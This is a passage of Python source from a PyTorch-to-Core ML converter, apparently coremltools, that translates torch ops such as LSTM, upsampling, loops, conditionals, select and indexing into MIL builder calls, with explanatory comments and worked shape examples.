n_weights_per_layer\n ],\n has_bias=has_bias,\n bidirectional=bidirectional,\n name=op_name,\n )\n # shape of lstm_out[0] == (S, B, H) if bidirectional = False else (S, B, 2*H)\n x = lstm_out[0]\n # shape of lstm_out[1] == (B, H) if bidirectional = False else (B, 2*H)\n h_out_list.append(lstm_out[1])\n # shape of lstm_out[2] == (B, H) if bidirectional = False else (B, 2*H)\n c_out_list.append(lstm_out[2])\n\n '''\n For torch, these are the dimensions of the 3 output tensors:\n (1) output[0] :\n (Seq, B, H) if batch_first = False, bidirectional = False\n (Seq, B, 2*H) if batch_first = False, bidirectional = True\n (B, Seq, H) if batch_first = True, bidirectional = False\n (B, Seq, 2*H) if batch_first = True, bidirectional = True\n\n (2) & (3) these are the state outputs:\n (num_layers, B, H) if bidirectional = False\n (num_layers * 2, B, H) if bidirectional = True\n\n MIL lstm layer's output shapes:\n (1) output[0]:\n (Seq, B, H) if bidirectional = False\n (Seq, B, 2*H) if bidirectional = True\n This means we need a transpose op if batch_first is True\n\n (2) & (3) shapes of the state outputs:\n each MIL LSTM op will produce final state tensors with the following shape:\n (B, H) if bidirectional = False\n (B, 2*H) if bidirectional = True\n\n stack/expand the final state tensors to match the Torch output\n '''\n
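\n # Worked example (added, illustrative only): num_layers=2, bidirectional=True.\n # Each MIL lstm emits h/c states of shape (B, 2*H); the split/stack below turns each\n # per-layer (B, 2*H) state into a (2, B, H) piece and concatenates the pieces into\n # the torch-style (num_layers * 2, B, H) == (4, B, H) state outputs.\n for index, (name, output) in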
enumerate(zip(node.outputs, lstm_out)):\n if index > 0:\n # index > 0 ===> it's one of the state outputs (h or c)\n if bidirectional:\n if num_layers == 1:\n out1, out2 = mb.split(\n x=output, num_splits=2, axis=1\n ) # each output of shape [B, H] after the split\n final_out = mb.stack(\n values=[out1, out2], axis=0, name=name\n ) # [2, B, H]\n context.add(final_out, name)\n else:\n out_state_tensors_list = (\n h_out_list if index == 1 else c_out_list\n ) # each tensor in the list is of shape (B, 2*H)\n list_of_tensors_to_stack = []\n for i in range(num_layers):\n out1, out2 = mb.split(\n x=out_state_tensors_list[i], num_splits=2, axis=1\n ) # each output of shape [B, H] after the split\n out = mb.stack(values=[out1, out2], axis=0) # [2, B, H]\n list_of_tensors_to_stack.append(out)\n final_out = mb.concat(\n values=list_of_tensors_to_stack, axis=0, name=name\n ) # output of shape (num_layers * 2, B, H)\n context.add(final_out, name)\n else:\n if num_layers == 1:\n unsqueeze = mb.expand_dims(x=output, axes=[0], name=name)\n context.add(unsqueeze, name)\n else:\n out = mb.stack(\n values=h_out_list if index == 1 else c_out_list,\n axis=0,\n name=name,\n )\n context.add(out, name)\n else:\n if batch_first:\n output = mb.transpose(x=output, perm=[1, 0, 2], name=name)\n context.add(output, name)\n\n\ndef _get_scales_from_output_size(output_size, input_shape):\n scales = []\n if output_size is not None:\n # output_size will be either\n # (1) A list of Var, and each Var indicates the output size for that dimension\n # (2) A single Var which indicates the whole output size\n # (3) A numpy array\n\n if isinstance(output_size, list):\n output_size = [x.val for x in output_size]\n if isinstance(output_size, Var):\n output_size = [x for x in output_size.val]\n if isinstance(output_size, _np.ndarray):\n output_size = output_size.tolist()\n\n # output size is computed using the formula floor (scale * input_size) in Core ML (and PyTorch).\n # Thus, when computing the scales from the output size, we add a small positive constant to the output size\n # to make sure that the floor formula results in the correct output size and not 1 unit smaller.\n # For instance, if output size = 5 and input size = 2, then scale will be 2.5, which can get\n # represented as 2.49999 due to float precision issues, and this might result in an output size of 4\n # instead of 5, without the epsilon correction.\n
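\n # Worked arithmetic (added, illustration only): Hin=2, Hout=5 -> 5 % 2 != 0, so\n # scale = (5 + 1e-4) / 2 = 2.50005 and floor(2 * 2.50005) == 5 as required, whereas\n # a float-rounded 2.49999 would have produced floor(4.99998) == 4.\n\n if len(output_size) == 1:\n # 1d upsampling\n Hout = output_size[0]\n Hin = input_shape[-1]\n scales_h = Hout / Hin if Hout % Hin == 0 else (Hout + 1e-4) / Hin\n scales = scales_h\n elif len(output_size) == 2:\n # 2d upsampling\n Hout, Wout = output_size[0], output_size[1]\n Hin, Win = input_shape[-2], input_shape[-1]\n scales_h = Hout / Hin if Hout % Hin == 0 else (Hout + 1e-4) / Hin\n scales_w = Wout / Win if Wout % Win == 0 else (Wout + 1e-4) / Win\n scales = [scales_h, scales_w]\n else:\n msg = \"Only 1d and 2d upsampling are supported.\"\n raise NotImplementedError(msg)\n\n return scales\n\n\ndef _is_float_value(x, threshold=0.001):\n return x - _math.floor(x) > threshold\n\n\n@register_torch_op\ndef upsample_linear1d(context, node):\n inputs = _get_inputs(context, node)\n x = inputs[0]\n output_size = inputs[1]\n align_corners = bool(inputs[2].val)\n scale = inputs[3]\n\n scale_factor = None\n\n if scale is not None and scale.val is not None and scale.shape == (1,):\n # Get the scale factor from provided inputs\n # This happens when recompute_scale_factor = False\n scale_factor = scale.val[0]\n\n # Currently, we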
are not supporting recompute_scale_factor = False, align_corners = False with float output size\n _, _, h = x.shape\n if not is_symbolic(h):\n # For the static input shape, we can compute the output size beforehand, and check if it is a float value\n output_size = h * scale_factor\n is_float = _is_float_value(output_size)\n else:\n # For the dynamic input shape, we check if the scale factor itself is float\n is_float = _is_float_value(scale_factor)\n\n if is_float and not align_corners:\n msg = (\n \"recompute_scale_factor = False, align_corners = False with float output size is \"\n + \"not supported for the upsample op {}\".format(node.name)\n )\n raise NotImplementedError(msg)\n\n elif isinstance(output_size, list):\n # When the input shape is dynamic and recompute_scale_factor = True,\n # we need to trace the graph to find the scale factor.\n x = mb.expand_dims(x=x, axes=[3])\n x = mb.torch_upsample_bilinear(\n x=x,\n output_height=output_size[0],\n output_width=1,\n align_corners=align_corners,\n )\n x = mb.squeeze(x=x, axes=[3], name=node.name)\n context.add(x)\n return\n\n elif output_size.val is not None:\n # Infer the scale factor from the provided output size\n scale_factor = _get_scales_from_output_size(output_size, x.shape)\n\n # Expand the input to a 4d tensor, and use MIL's upsample_bilinear op\n x = mb.expand_dims(x=x, axes=[3])\n x = mb.upsample_bilinear(\n x=x,\n scale_factor_height=scale_factor,\n scale_factor_width=1.,\n align_corners=align_corners,\n )\n x = mb.squeeze(x=x, axes=[3], name=node.name)\n context.add(x)\n\n\n@register_torch_op\ndef upsample_bilinear2d(context, node):\n inputs = _get_inputs(context, node)\n _input = inputs[0]\n output_size = inputs[1]\n align_corners = bool(inputs[2].val)\n scale_factors = inputs[3]\n\n scales_h, scales_w = None, None\n\n if (\n scale_factors is not None\n and scale_factors.val is not None\n and scale_factors.rank == 1\n and scale_factors.shape[0] == 2\n ):\n # get scale factors from provided inputs\n # this happens when recompute_scale_factor = False\n scale_factors = scale_factors.val\n scales_h = scale_factors[0]\n scales_w = scale_factors[1]\n\n # currently, we are not supporting recompute_scale_factor = False, align_corners = False with float output size\n _, _, h, w = _input.shape\n if not is_symbolic(h) and not is_symbolic(w):\n # For the static input shape, we can compute the output size beforehand\n output_h = h * scales_h\n output_w = w * scales_w\n is_h_float = _is_float_value(output_h)\n is_w_float = _is_float_value(output_w)\n\n else:\n # For the dynamic input shape, we check if the scale factor itself is float\n is_h_float = _is_float_value(scales_h)\n is_w_float = _is_float_value(scales_w)\n\n if (is_h_float or is_w_float) and not align_corners:\n msg = (\n \"recompute_scale_factor = False, align_corners = False with float output size is \"\n + \"not supported for the upsample op {}\".format(node.name)\n )\n raise NotImplementedError(msg)\n\n elif (\n isinstance(output_size, list)\n and output_size[0].val is None\n and output_size[1].val is None\n ):\n # the input shape is dynamic and recompute_scale_factor = True\n # need to trace the graph to find the scale factor\n # we define a torch front end op mb.torch_upsample_bilinear to resolve the const scaling factor\n torch_upsample_bilinear = mb.torch_upsample_bilinear(\n x=_input,\n output_height=output_size[0],\n output_width=output_size[1],\n align_corners=align_corners,\n name=node.name,\n )\n context.add(torch_upsample_bilinear)\n return\n else:\n # infer 
scale factors from output sizes\n # This happens when recompute_scale_factor = True or the output_size is specified\n scales = _get_scales_from_output_size(output_size, _input.shape)\n if scales:\n scales_h, scales_w = scales\n\n if scales_h is None or scales_w is None:\n if len(inputs) == 5:\n # For torch==1.5.0, upsample_bilinear2d has 5 inputs.\n scales_h = inputs[3]\n scales_w = inputs[4]\n else:\n raise ValueError(\"Failed to infer scale factors from inputs.\")\n\n upsample_bilinear = mb.upsample_bilinear(\n x=_input,\n scale_factor_height=scales_h,\n scale_factor_width=scales_w,\n align_corners=align_corners,\n name=node.name,\n )\n context.add(upsample_bilinear)\n\n\n@register_torch_op\ndef upsample_nearest1d(context, node):\n inputs = _get_inputs(context, node)\n x = inputs[0]\n output_size = inputs[1]\n scale = inputs[2]\n\n scale_factor = None\n\n if scale is not None and scale.val is not None and scale.shape == (1,):\n # Get the scale factor from provided inputs\n # This happens when recompute_scale_factor = False\n scale_factor = scale.val[0]\n\n elif isinstance(output_size, list):\n # When the input shape is dynamic and recompute_scale_factor = True,\n # we need to trace the graph to find the scale factor.\n x = mb.expand_dims(x=x, axes=[3])\n x = mb.torch_upsample_nearest_neighbor(\n x=x,\n output_height=output_size[0],\n output_width=1,\n )\n x = mb.squeeze(x=x, axes=[3], name=node.name)\n context.add(x)\n return\n else:\n # Infer scale factors from output sizes\n scale_factor = _get_scales_from_output_size(output_size, x.shape)\n\n x = mb.expand_dims(x=x, axes=[3])\n x = mb.upsample_nearest_neighbor(\n x=x,\n scale_factor_height=scale_factor,\n scale_factor_width=1.,\n )\n x = mb.squeeze(x=x, axes=[3], name=node.name)\n context.add(x)\n\n\n@register_torch_op\ndef upsample_nearest2d(context, node):\n inputs = _get_inputs(context, node)\n _input = inputs[0]\n scales_h, scales_w = None, None\n\n output_size = inputs[1]\n scale_factors = inputs[2]\n\n if (\n scale_factors is not None\n and scale_factors.val is not None\n and scale_factors.rank == 1\n and scale_factors.shape[0] == 2\n ):\n # get scale factors from provided inputs\n scale_factors = scale_factors.val\n scales_h = scale_factors[0]\n scales_w = scale_factors[1]\n elif (\n isinstance(output_size, list)\n and output_size[0].val is None\n and output_size[1].val is None\n ):\n # the input shape is dynamic and recompute_scale_factor = True\n # need to trace the graph to find the scale factor\n # we define a torch front end op mb.torch_upsample_nearest_neighbor to resolve the const scaling factor\n torch_upsample_nearest2d = mb.torch_upsample_nearest_neighbor(\n x=_input,\n output_height=output_size[0],\n output_width=output_size[1],\n name=node.name,\n )\n context.add(torch_upsample_nearest2d)\n return\n else:\n # infer scale factors from output sizes\n scales = _get_scales_from_output_size(output_size, _input.shape)\n if scales:\n scales_h, scales_w = scales\n\n if scales_h is None or scales_w is None:\n if len(inputs) == 5:\n # For torch==1.5.0, upsample_nearest2d has 5 inputs.\n scales_h = inputs[3]\n scales_w = inputs[4]\n else:\n raise ValueError(\"Failed to infer scale factors from inputs.\")\n\n upsample_nearest2d = mb.upsample_nearest_neighbor(\n x=_input,\n scale_factor_height=scales_h,\n scale_factor_width=scales_w,\n name=node.name,\n )\n context.add(upsample_nearest2d)\n\n\n@register_torch_op(torch_alias=[\"listunpack\"])\ndef tupleunpack(context, node):\n inputs = _get_inputs(context, node, expected=1)\n
values = inputs[0]\n\n # Node input could have been turned into constant array in @tupleconstruct\n if not isinstance(values, (tuple, list)):\n if values.val is not None:\n values = values.val\n else:\n # The `values` could be a single Var with symbolic val.\n values = [values]\n\n if len(values) != len(node.outputs):\n raise ValueError(f\"unpack node expected {len(node.outputs)} outputs, got {len(values)}\")\n\n # @value is either a numpy primitive or a Var object\n for value, output in zip(values, node.outputs):\n if not isinstance(value, Var):\n value = _construct_constant(value, name=output)\n assert isinstance(value, Var)\n context.add(value, output)\n\n\n@register_torch_op\ndef loop(context, node):\n \"\"\" In TorchIR, a loop looks like:\n %y_1, ..., %y_r = prim::Loop(%max_trip_count, %initial_condition, %x_1, ..., %x_r)\n block0(%i, %a_1, ..., %a_r):\n %b_1, ..., %b_m = some::node(%a_value_from_outer_block, %a_1)\n %iter_condition = some::other_node(%a_2)\n -> (%iter_condition, %b_1, ..., %b_r)\n\n This translates to pseudo code as:\n y_1, ..., y_r = x_1, ..., x_r\n condition = initial_condition\n i = 0\n while condition and i < max_trip_count:\n a_1, ..., a_r = y_1, ..., y_r\n\n ############################################################\n # Actual body of the loop\n b_1, ..., b_m = some::node(a_value_from_outside_of_the_loop, a_1)\n iter_condition = some::node(a_2)\n ############################################################\n\n y_1, ..., y_r = b_1, ..., b_r\n condition = iter_condition\n i += 1\n\n Which further translates to MIL while_loop as:\n loop_vars = (0, initial_condition, x_1, ..., x_r)\n _cond = {\n return (loop_vars[1] and loop_vars[0] < max_trip_count)\n }\n _body = {\n a_1, ..., a_r = loop_vars[2], ..., loop_vars[-1]\n b_1, ..., b_m = some::node(a_value_from_outside_of_the_loop, a_1)\n iter_condition = some::node(a_2)\n return (loop_vars[0] + 1, iter_condition, b_1, ..., b_r)\n }\n\n For loops pass True for %initial_condition and %iter_condition\n While loops set %max_trip_count to INT_MAX and %i is unused\n \"\"\"\n name = node.name\n # inputs[0]: max iter count\n # inputs[1]: initial condition\n # inputs[2]: block input 0\n # ...\n # inputs[N+2]: block input N\n inputs = _get_inputs(context, node)\n max_iter_count = inputs[0]\n\n # Magic default signals this is a while-only loop, so no iteration count\n # is needed.\n has_iter_count = max_iter_count is not None\n\n # Create an iteration count. This will only be used if this is a for loop.\n iter_count = mb.const(val=0, name=node.name + \"_iter\")\n # @loop_vars is tuple(iter_count, cond, inputs...)\n loop_vars = tuple([iter_count] + inputs[1:])\n\n def _loop_cond(*loop_vars):\n cond = loop_vars[1]\n\n # Check the iteration count if we're keeping track.\n if has_iter_count:\n iter_count = loop_vars[0]\n iter_cond = mb.less(\n x=iter_count, y=max_iter_count, name=node.name + \"_cond\"\n )\n return mb.logical_and(x=cond, y=iter_cond)\n else:\n return mb.identity(x=cond)\n\n def _shapes_are_equivalent(shape1, shape2):\n \"\"\" Compares two sets of tensor shapes and returns True if they are\n equivalent.
That is, they are the same rank, and each dimension\n is the same or symbolic.\n \"\"\"\n if len(shape1) != len(shape2):\n return False\n\n # Each dimension must have the same integer length, or else be\n # symbolic.\n all_equivalent = [\n s1 == s2 or (isinstance(s1, Symbol) and isinstance(s2, Symbol))\n for s1, s2 in zip(shape1, shape2)\n ]\n return all_equivalent\n\n def _loop_body(*loop_vars):\n block = node.blocks[0]\n iter_var = loop_vars[0]\n inputs = (iter_var,) + loop_vars[2:]\n res = convert_block(context, block, inputs)\n\n for input_var, output_var in zip(loop_vars[2:], res[1:]):\n if not _shapes_are_equivalent(input_var.shape, output_var.shape):\n logger.warning(\n \"detected change in shape of loop variable. this could lead to incorrect inference results!\"\n )\n logger.warning(\n \"{}:{} -> {}:{}\".format(\n input_var.name,\n input_var.shape,\n output_var.name,\n output_var.shape,\n )\n )\n\n # Update the iteration count if we're keeping track.\n if has_iter_count:\n iter_var = mb.add(x=iter_var, y=1, name=iter_var.name + \"_inc\")\n else:\n iter_var = mb.identity(x=iter_var)\n\n # Must return tuple with same length and types as @loop_vars.\n return tuple(\n [\n iter_var,\n ]\n + res\n )\n\n loop = mb.while_loop(\n _cond=_loop_cond, _body=_loop_body, loop_vars=loop_vars, name=name\n )\n\n # Make sure the loop returned the expected number of outputs. Note that the\n # first two loop outputs are the iteration count and condition.\n assert len(loop) - 2 == len(node.outputs)\n for output_name, output_var in zip(node.outputs, loop[2:]):\n context.add(output_var, torch_name=output_name)\n\n\n@register_torch_op(torch_alias=[\"if\"])\ndef _if(context, node):\n \"\"\" In TorchIR, a conditional looks like:\n %y_1, ..., %y_r = prim::If(%condition)\n block0(): # TRUE BRANCH, never takes arguments, has to return r outputs\n %t_1, ..., %t_k = some::node(%a_value_from_outer_block)\n -> (%t_1, ..., %t_r)\n block1(): # FALSE BRANCH, never takes arguments, has to return r outputs\n %f_1, ..., %f_m = some::node(%a_value_from_outer_block)\n -> (%f_1, ..., %f_r)\n\n This translates to pseudo code as:\n if (condition):\n t_1, ..., t_k = some::node(a_value_from_outer_block)\n y_1, ..., y_r = t_1, ..., t_r\n else:\n f_1, ..., f_m = some::node(a_value_from_outer_block)\n y_1, ..., y_r = f_1, ..., f_r\n\n Which further translates to MIL cond as:\n _true = {\n t_1, ..., t_k = some::node(a_value_from_outer_block)\n return (t_1, ..., t_r)\n }\n _false = {\n f_1, ..., f_m = some::node(a_value_from_outer_block)\n return (f_1, ..., f_m)\n }\n \"\"\"\n name = node.name\n # inputs[0]: condition\n inputs = _get_inputs(context, node, expected=1)\n condition = inputs[0]\n\n assert len(node.blocks) == 2\n true_block = node.blocks[0]\n false_block = node.blocks[1]\n\n def _true_path():\n res = convert_block(context, true_block, [])\n return tuple(res)\n\n def _false_path():\n res = convert_block(context, false_block, [])\n return tuple(res)\n\n cond = mb.cond(\n pred=condition, _true_fn=_true_path, _false_fn=_false_path, name=name\n )\n # If the condition only returns one item, wrap it in a tuple.\n if not isinstance(cond, (tuple, list)):\n cond = (cond,)\n\n # Make sure the condition returned the expected number of outputs.\n assert len(cond) == len(node.outputs)\n for output_name, output_var in zip(node.outputs, cond):\n context.add(output_var, torch_name=output_name)\n\n\n@register_torch_op(torch_alias=[\"select_copy.int\"])\ndef select(context, node):\n inputs = _get_inputs(context, node, expected=3)\n _input 
= inputs[0]\n dim = inputs[1].val\n index = inputs[2]\n\n assert dim.shape == ()\n\n # NOTE:\n # Each index in @begin_array/@end_array corresponds to a dimension of @_input\n # Each val of those arrays corresponds to the start/end index to slice in that dimension\n
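\n # Worked example (added comment, illustration only): select(x, dim=1, index=2) on a\n # rank-3 input becomes slice_by_index with begin=[0, 2, 0], end[1]=3,\n # end_mask=[True, False, True] and squeeze_mask=[False, True, False] -- i.e.\n # x[:, 2, :] with axis 1 dropped.\n rank = _input.rank\n\n begin_array = [0] * rank\n if index.val is None:\n # index value not known till runtime\n begin_array[dim] = index\n begin_array = mb.concat(values=begin_array, axis=0)\n else:\n # index value known now\n assert index.val.shape == ()\n begin_array[dim] = index.val\n\n end_array = [s if isinstance(s, int) else 0 for s in _input.shape]\n end_mask = [True] * rank\n squeeze_mask = [False] * rank\n squeeze_mask[dim] = True\n\n if index.val != -1:\n if index.val is None:\n # index value not known till runtime\n temp = mb.add(x=index, y=1)\n end_array[dim] = temp\n end_array = mb.concat(values=end_array, axis=0)\n else:\n end_array[dim] = index.val + 1\n end_mask[dim] = False\n\n slice_by_index = mb.slice_by_index(\n x=_input,\n begin=begin_array,\n end=end_array,\n end_mask=end_mask,\n squeeze_mask=squeeze_mask,\n name=node.name,\n )\n context.add(slice_by_index)\n\n\n@register_torch_op\ndef getitem(context, node):\n inputs = _get_inputs(context, node, expected=2)\n\n if not isinstance(inputs[0], (list, tuple)):\n raise AssertionError(\"Item selection is supported only on python list/tuple objects\")\n\n if inputs[1].val is None:\n raise AssertionError(\"Only static item selection supported\")\n\n try:\n index = int(inputs[1].val)\n except:\n raise AssertionError(\n f\"Index into python list/tuple needs to be integer. Provided value: {inputs[1].val}\"\n )\n\n out = inputs[0][index]\n\n if out is None:\n raise AssertionError(\n f\"coremltools lowering didn't handle/bind value at index {index}.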
Please inspect the lowering of parent op for its return value\"\n )\n\n context.add(out, torch_name=node.name)\n\n\n@register_torch_op\ndef type_as(context, node):\n inputs = _get_inputs(context, node, expected=2)\n\n if inputs[0].dtype == inputs[1].dtype:\n x = mb.identity(x=inputs[0], name=node.name)\n else:\n x = inputs[0]\n if inputs[1].dtype not in TYPE_TO_DTYPE_STRING:\n raise NotImplementedError(\n \"Tensor type {} cast is not supported.\".format(inputs[1].dtype)\n )\n x = mb.cast(x=x, dtype=TYPE_TO_DTYPE_STRING[inputs[1].dtype], name=node.name)\n\n context.add(x)\n\n\n@register_torch_op\ndef nonzero(context, node):\n inputs = _get_inputs(context, node, expected=1)\n x = inputs[0]\n nonzero = mb.non_zero(x=x, name=node.name)\n context.add(nonzero)\n\n\ndef _get_slice_params(context, data, inputs):\n def _expand_list_to_rank_1(arr):\n \"\"\"\n We make the elements in begin and end rank 1,\n so the pattern of ``squeeze -> expand_dims`` can be removed\n by the ``fuse_squeeze_expand_dims`` graph pass.\n \"\"\"\n for i, val in enumerate(arr):\n if isinstance(val, Var):\n if val.rank == 0:\n arr[i] = mb.expand_dims(x=val, axes=[0])\n else:\n arr[i] = np.array([val])\n return arr\n\n rank = data.rank\n begin = [0] * rank\n end = [0] * rank\n stride = [1] * rank\n begin_mask = [False] * rank\n end_mask = [False] * rank\n squeeze_mask = [False] * rank\n\n num_of_slice_set = len(inputs) // 3\n\n for i in range(num_of_slice_set):\n if inputs[3 * i + 1] is None:\n # This is pure index select\n idx = context[inputs[3 * i]]\n if idx.val is not None:\n idx = idx.val\n begin[i] = idx\n squeeze_mask[i] = True\n else:\n # This is a slice\n begin_var = context[inputs[3 * i]]\n end_var = context[inputs[3 * i + 1]]\n stride_var = context[inputs[3 * i + 2]]\n\n if begin_var is None:\n begin_mask[i] = True\n else:\n begin[i] = begin_var\n\n if end_var is None:\n end_mask[i] = True\n else:\n end[i] = end_var\n\n if stride_var is None:\n stride[i] = 1\n else:\n stride[i] = stride_var.val\n\n for i in range(num_of_slice_set, rank):\n begin_mask[i] = True\n end_mask[i] = True\n\n begin = _expand_list_to_rank_1(begin)\n end = _expand_list_to_rank_1(end)\n begin = mb.concat(values=begin, axis=0)\n end = mb.concat(values=end, axis=0)\n\n return begin, end, stride, begin_mask, end_mask, squeeze_mask\n
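\n# Worked example (added comment, illustration only): for an assignment such as\n# x[1:3, :, 2] = v on a rank-3 tensor, the params above come out roughly as\n# begin=[1, 0, 2], end=[3, 0, 0], begin_mask=[False, True, False],\n# end_mask=[False, True, False], squeeze_mask=[False, False, True]\n# (entries covered by a mask or a squeeze are ignored by the op).\n\n\ndef _translate_torch_tensor_assign(\n x,\n updates,\n begin,\n end,\n stride,\n begin_mask,\n end_mask,\n squeeze_mask,\n name,\n):\n return mb.torch_tensor_assign(\n x=x,\n updates=updates,\n begin=begin,\n end=end,\n stride=stride,\n begin_mask=begin_mask,\n end_mask=end_mask,\n squeeze_mask=squeeze_mask,\n name=name,\n )\n\n\n@register_torch_op\ndef _internal_op_tensor_inplace_copy(context, node):\n data = context[node.inputs[0]]\n updates = context[node.inputs[1]]\n begin, end, stride, begin_mask, end_mask, squeeze_mask = _get_slice_params(\n context, data, node.inputs[2:]\n )\n\n data, updates = promote_input_dtypes([data, updates])\n updated_x = _translate_torch_tensor_assign(\n x=data,\n updates=updates,\n begin=begin,\n end=end,\n stride=stride,\n begin_mask=begin_mask,\n end_mask=end_mask,\n squeeze_mask=squeeze_mask,\n name=node.name,\n )\n context.add(updated_x)\n\n\n@register_torch_op\ndef _internal_op_tensor_inplace_fill(context, node):\n data = context[node.inputs[0]]\n fill_scalar = context[node.inputs[1]]\n\n if len(node.inputs) == 2 and fill_scalar.val is not None:\n shape = mb.shape(x=data)\n if isinstance(fill_scalar.val, _np.ndarray):\n fill = mb.fill(shape=shape,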
value=fill_scalar.val.item())\n else:\n fill = mb.fill(shape=shape, value=fill_scalar)\n casted = mb.cast(x=fill, dtype=TYPE_TO_DTYPE_STRING[data.dtype], name=node.name)\n context.add(casted)\n return\n\n begin, end, stride, begin_mask, end_mask, squeeze_mask = _get_slice_params(\n context, data, node.inputs[2:]\n )\n if begin.val is None or end.val is None or any_symbolic(data.shape):\n raise ValueError(\"_internal_op_tensor_inplace_fill does not support dynamic index\")\n\n fill_shape = solve_slice_by_index_shape(\n data.shape, begin.val, end.val, stride, begin_mask, end_mask, squeeze_mask\n )\n update_values = _np.full(fill_shape, fill_scalar.val)\n\n data, update_values = promote_input_dtypes([data, update_values])\n\n updated_x = _translate_torch_tensor_assign(\n x=data,\n updates=update_values,\n begin=begin,\n end=end,\n stride=stride,\n begin_mask=begin_mask,\n end_mask=end_mask,\n squeeze_mask=squeeze_mask,\n name=node.name,\n )\n context.add(updated_x)\n\n\n@register_torch_op\ndef index_put(context, node):\n inputs = _get_inputs(context, node, expected=4)\n x = inputs[0]\n indices = inputs[1]\n values = inputs[2]\n accumulate = inputs[3].val\n rank = x.rank\n mode = \"add\" if accumulate else \"update\"\n\n indices_type = indices[0].sym_type.get_primitive()\n\n if types.is_bool(indices_type):\n assert len(indices) == 1, \"Unsupported index_put_ usage.\"\n indices = indices[0]\n assert (\n indices.shape == x.shape\n ), \"indices shape must equal to input shape for index put operation.\"\n indices = mb.cast(x=indices, dtype=\"int32\")\n indices = mb.non_zero(x=indices)\n\n if types.is_int(indices_type):\n if len(indices) > 1:\n indices = mb.stack(values=indices, axis=indices[0].rank)\n else:\n indices = mb.expand_dims(x=indices[0], axes=[-1])\n\n if len(values.shape) == 0:\n values = mb.expand_dims(x=values, axes=[0])\n\n if values.rank == 1 and values.shape[0] == 1:\n reps = value_at(mb.shape(x=indices), 0)\n reps = mb.expand_dims(x=reps, axes=[0])\n values = mb.tile(x=values, reps=reps)\n\n if is_current_opset_version_compatible_with(target.iOS17):\n # IOS17 `scatter_nd` behaviour is undefined for negative indices.\n cond = mb.greater_equal(x=indices, y=0)\n x_shape = mb.shape(x=x)\n indices_shape = mb.shape(x=indices)\n indices_last_dim = value_at(indices_shape, indices.rank - 1)\n indices_last_dim_expand = mb.expand_dims(x=indices_last_dim, axes=[0])\n slice_shape = mb.slice_by_size(x=x_shape, begin=[0], size=indices_last_dim_expand)\n indices = mb.select(\n cond=cond,\n a=indices,\n b=mb.add(x=indices, y=slice_shape),\n )\n result = mb.scatter_nd(data=x, indices=indices, updates=values, mode=mode, name=node.name)\n context.add(result)\n\n\n@register_torch_op\ndef index(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x = inputs[0]\n indices = inputs[1]\n rank = x.rank\n\n \"\"\"\n Case 1: A single boolean index selection\n Ex:\n a = torch.rand(2, 3, 4)\n b = torch.rand(3, 4)\n index = b > 0.1\n c = a[:, b]\n\n For this case, the only non-None tensor is with dtype bool\n The true value indicates whether the element should be selected among the masked axes\n The output c is a tensor with shape (2, N), where N is the number of elements of b satisfying condition > 0.1\n \"\"\"\n boolean_indices_axis = []\n for i, index in enumerate(indices):\n if index is not None and types.is_bool(index.dtype):\n boolean_indices_axis.append(i)\n if len(boolean_indices_axis) == 1:\n # get the True element indices\n axis = boolean_indices_axis[0]\n axes = list(range(axis, axis + 
index.rank))\n index = indices[axis]\n index = mb.non_zero(x=index)\n\n # transpose the masked axes to the beginning\n perm = axes + [i for i in range(rank) if i not in axes]\n x = mb.transpose(x=x, perm=perm)\n x = mb.gather_nd(x=x, indices=index)\n\n # transpose the tensor back\n perm_back = list(range(1, x.rank))\n perm_back.insert(axis, 0)\n res = mb.transpose(x=x, perm=perm_back, name=node.name)\n context.add(res)\n return\n\n \"\"\"\n Case 2: Pure index selection\n Ex # 1 [Single dimension selection]:\n a = torch.rand(1,2,3,4)\n index = torch.tensor([0, 1])\n b = a[:,:,:,index]\n\n In this case, indices is a list [None, None, None, [0, 1]]. The None element means the corresponding\n dimension is masked.\n\n b has shape (1,2,3,2).\n\n Ex # 2 [Multiple disconnected dimensions selection]:\n a = torch.rand(1,2,3,4)\n index = torch.tensor([0, 1])\n b = a[:,index,:,index]\n\n In this case, indices is a list [None, [0,1], None, [0,1]]\n\n b has shape (2,1,3),\n where b[0,:,:] = a[:,0,:,0] and b[1,:,:] = a[:,1,:,1]\n\n Ex # 3 [Multiple connected dimensions selection]:\n a = torch.rand(1,2,3,4)\n index_1 = torch.tensor([0, 1])\n index_2 = torch.tensor([0, 1])\n b = a[:,index_1,index_2,:]\n\n indices is a list [None, [0, 1], [0, 1], None]\n\n b has shape (1,2,4),\n where b[:,0,:] = a[:,0,0,:] and b[:,1,:] = a[:,1,1,:]\n\n Ex # 4 [Selection with boolean masks]:\n a = torch.rand(4,5)\n index_1 = [True, True, False, False]\n index_2 = [False, True, True, False, False]\n b = a[index_1, index_2]\n\n indices is a list [[True, True, False, False], [False, True, True, False, False]]\n\n In this case, index_1 and index_2 are interpreted as masks and converted to the indices of their True elements,\n index_1 -> [0, 1]\n index_2 -> [1, 2]\n\n b has shape (2,),\n where b[0] = a[0, 1] and b[1] = a[1, 2]\n\n Ex # 5 [Broadcast selection]:\n a = torch.rand(1,2,3,4)\n index_1 = torch.tensor([0, 1])\n index_2 = torch.tensor([0])\n b = a[:,index_1,index_2,:]\n\n indices is a list [None, [0, 1], [0], None]\n\n In this case, index_2 is going to be broadcasted to [0, 0]\n\n b has shape (1,2,4),\n where b[:,0,:] = a[:,0,0,:] and b[:,1,:] = a[:,1,0,:]\n\n \"\"\"\n\n # get the index axes\n indices = indices + [None] * (x.rank - len(indices))\n indices_axes = []\n valid_indices = []\n for i, index in enumerate(indices):\n if index is not None:\n indices_axes.append(i)\n valid_indices.append(index)\n\n # If all elements in indices are None, simply return the original tensor.\n if len(indices_axes) == 0:\n x = mb.identity(x=x, name=node.name)\n context.add(x)\n return\n\n # convert all indices to int type\n for i, indice in enumerate(valid_indices):\n if indice is not None and types.is_bool(indice.dtype):\n indice = mb.non_zero(x=indice)\n indice = mb.squeeze(x=indice, axes=[1])\n valid_indices[i] = indice\n\n # For the single index axis case, we can use mb.gather directly\n if len(indices_axes) == 1:\n axis = indices_axes[0]\n indices = valid_indices[0]\n if is_current_opset_version_compatible_with(target.iOS17):\n # IOS17 `gather` behaviour is undefined for negative indices.\n indices = mb.select(\n cond=mb.greater_equal(x=indices, y=0),\n a=indices,\n b=mb.add(x=indices, y=value_at(mb.shape(x=x), axis)),\n )\n x = mb.gather(x=x, indices=indices, axis=axis, name=node.name)\n context.add(x)\n return\n\n # For multiple index axes case, we delegate broadcast to np if there is no dynamic shape.\n if all(not any_symbolic(idx.shape) for idx in valid_indices):\n broadcasted_shape = _np.broadcast_shapes(*[idx.shape for idx in valid_indices])\n for i, index in 
